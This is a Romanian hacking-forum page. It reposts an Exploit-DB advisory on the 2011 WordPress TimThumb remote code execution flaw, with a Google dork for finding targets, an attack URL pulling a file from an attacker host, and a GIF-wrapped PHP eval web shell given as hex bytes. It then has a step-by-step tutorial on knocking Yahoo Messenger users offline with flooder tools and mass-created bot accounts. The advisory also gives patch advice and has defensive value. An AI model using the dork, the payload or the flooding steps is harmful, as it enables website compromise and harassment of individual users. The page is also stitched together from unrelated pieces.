Leaderboard

Trebuie vizualizat..sper ca se mai curata niste prosti care cred in pule verzi pe perete.

Da-mi PM cu o adresa de mail

# Google Dork: inurl:timthumb ext:php -site:googlecode.com -site:google.com # Date: 3rd August 2011 # Author: MaXe # Software Link: http://timthumb.googlecode.com/svn-history/r141/trunk/timthumb.php # Version: 1.32 # Screenshot: See attachment # Tested on: Windows XP + Apache + PHP (XAMPP) WordPress TimThumb (Theme) Plugin - Remote Code Execution Versions Affected: 1.* - 1.32 (Only version 1.19 and 1.32 were tested.) (Version 1.33 did not save the cache file as .php) Info: (See references for original advisory) TimThumb is an image resizing utility, widely used in many WordPress themes. Links: http://www.binarymoon.co.uk/projects/timthumb/ http://code.google.com/p/timthumb/ Credits: - Mark Maunder (Original Researcher) - MaXe (Indepedendent Proof of Concept Writer) -:: The Advisory ::- TimThumb is prone to a Remote Code Execution vulnerability, due to the script does not check remotely cached files properly. By crafting a special image file with a valid MIME-type, and appending a PHP file at the end of this, it is possible to fool TimThumb into believing that it is a legitimate image, thus caching it locally in the cache directory. Attack URL: (Note! Some websites uses Base64 Encoding of the src GET-request.) [url]http://www.target.tld/wp-content/themes/THEME/timthumb.php?src=http://blogger.com.evildomain.tld/pocfile.php[/url] Stored file on the Target: (This can change from host to host.) 1.19: http://www.target.tld/wp-content/themes/THEME/cache/md5($src); 1.32: http://www.target.tld/wp-content/themes/THEME/cache/external_md5($src); md5($src); means the input value of the 'src' GET-request - Hashed in MD5 format. PoC File: \x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00 \xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00 \x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02 \x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65 \x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D \x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00 (Transparent GIF + <?php @eval($_GET['cmd']) ?> -:: Solution ::- Update to the latest version 1.34 or delete the timthumb file. NOTE: This file is often renamed and you should therefore issue a command like this in a terminal: (Thanks to rAWjAW for this info.) find . | grep php | xargs grep -s timthumb Disclosure Information: - Vulnerability Disclosed (Mark Maunder): 1st August 2011 - Vulnerability Researched (MaXe): 2nd August 2011 - Disclosed at The Exploit Database: 3rd August 2011 References: http://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/ http://markmaunder.com/2011/technical-details-and-scripts-of-the-wordpress-timthumb-php-hack/ http://code.google.com/p/timthumb/issues/detail?id=212 http://programming.arantius.com/the+smallest+possible+gif Sursa

[+] Am vazut ca majoritatea userilor noi care apar pe forum cauta asta si am vazut ca mai este un topic in care toti scriu si nu le raspunde nimeni la intrebari si mai mult de atat buti nu sunt buni ceea ce ii face pe ei sa creada ca programul nu e bun. O sa fac eu sa zicem "tutorialul" acesta pentru userii care nu stiu ce au de facut. [+] Pentru inceput avem nevoie de o arhiva cu cateva "floodere" (sunt cele pe care le folosesc si eu ) Arhiva contine 3 foldere : - Flooderi - IR IDMakerV3.2 - Multi Yahoo Boots Checker La Flooderi sunt programele , La IR IDMaker V3.2 este un program cu care puteati realiza buti foarte usor ,si la Multi Yahoo Boots Checker se afla un program cu care puteti scana lista voastra de buti si sa salvati buti care mai merg si sa scapati de cei care numai merg. [+] Intrati la Flooderi si deschideti pe rand doar : -Big Killer Release -Fusion Ym v2 -GMC Booters Restul de 2 le lasati acolo pentru ca nu merg si mi-a fost lene sa le sterg..^^ La toate cele 3 programe o sa vedeti ca va apare Load la fiecare dintre ele. Dati la Load pe rand la fiecare si selectati fisierul .txt din folderul Flooderi numit dEv1L Boots buni. Faceti la fel la toate si dupaia dati la toate log in. Asteptati putin sa se incarce toate . O sa ia ceva timp sa se incarce..Nu mult.Cam 45 de secunde . Dupa ce s-au incarcat buti bagati idiul acolo la Victim si dati in felul urmator. La Big Killer Release dati Flood ,la Fusion Ym dati Fast YM Flood iar la Gmc booters dati Boot 1. Acum victima va fi scoasa de pe mess.Nu dureaza foarte mult ..depinde de viteza netului. [+]Cam asta e tot ca sa flodati pe cineva. [+]Ca sa creati buti faceti in felul urmator : Intrati in arhiva IR IDMakerV3.2 Intrati in IR IDMaker . Cand ati intrat in el bifati : -Random Boot name -Randomize Name and Lastname -Randomize information Si apasati butonul start. Acum v-a aparut codul captcha in dreapta pe care va trebui sa il scrieti in stanga butonului Create..Dupa fiecaredata cand scrieti codul apasati pe Create.Si un boot se va creea. Dupa dati Save si veti putea salva buti creati unde vreti. [+] Daca "tutorialul" meu v-a fost de ajutor apasati pe butonul REP de sub avatarul meu. Sper ca am fost de folos noilor membri care cautau asta.